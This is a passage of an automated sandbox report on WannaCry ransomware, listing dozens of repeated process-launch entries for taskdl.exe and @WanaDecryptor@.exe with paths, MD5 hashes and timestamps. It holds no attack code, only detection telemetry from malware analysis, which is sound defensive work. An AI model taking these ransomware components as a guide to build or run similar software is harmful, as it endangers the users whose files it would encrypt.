                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:135
                                                                                      Start time:15:48:03
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:136
                                                                                      Start time:15:48:03
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:137
                                                                                      Start time:15:48:03
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:138
                                                                                      Start time:15:48:03
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:139
                                                                                      Start time:15:48:03
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:140
                                                                                      Start time:15:48:03
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:141
                                                                                      Start time:15:48:04
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:142
                                                                                      Start time:15:48:04
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:143
                                                                                      Start time:15:48:04
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:144
                                                                                      Start time:15:48:04
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:145
                                                                                      Start time:15:48:04
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:146
                                                                                      Start time:15:48:04
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:147
                                                                                      Start time:15:48:04
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:148
                                                                                      Start time:15:48:04
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:149
                                                                                      Start time:15:48:04
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:150
                                                                                      Start time:15:48:04
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:151
                                                                                      Start time:15:48:04
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:152
                                                                                      Start time:15:48:05
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:153
                                                                                      Start time:15:48:05
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:154
                                                                                      Start time:15:48:05
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:155
                                                                                      Start time:15:48:05
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:156
                                                                                      Start time:15:48:05
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:157
                                                                                      Start time:15:48:05
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:158
                                                                                      Start time:15:48:05
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:159
                                                                                      Start time:15:48:05
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:160
                                                                                      Start time:15:48:05
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:161
                                                                                      Start time:15:48:05
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:162
                                                                                      Start time:15:48:05
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:163
                                                                                      Start time:15:48:05
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:164
                                                                                      Start time:15:48:06
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:165
                                                                                      Start time:15:48:06
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:166
                                                                                      Start time:15:48:06
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:167
                                                                                      Start time:15:48:06
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:168
                                                                                      Start time:15:48:06
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:169
                                                                                      Start time:15:48:06
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:170
                                                                                      Start time:15:48:06
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:171
                                                                                      Start time:15:48:06
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:172
                                                                                      Start time:15:48:06
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:173
                                                                                      Start time:15:48:06
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:174
                                                                                      Start time:15:48:06
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:175
                                                                                      Start time:15:48:06
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:176
                                                                                      Start time:15:48:07
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:177
                                                                                      Start time:15:48:07
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:178
                                                                                      Start time:15:48:07
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:179
                                                                                      Start time:15:48:07
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:180
                                                                                      Start time:15:48:07
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:181
                                                                                      Start time:15:48:07
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:182
                                                                                      Start time:15:48:07
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:183
                                                                                      Start time:15:48:07
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:@WanaDecryptor@.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:245'760 bytes
                                                                                      MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:184
                                                                                      Start time:15:48:07
                                                                                      Start date:23/03/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:taskdl.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:20'480 bytes
                                                                                      MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
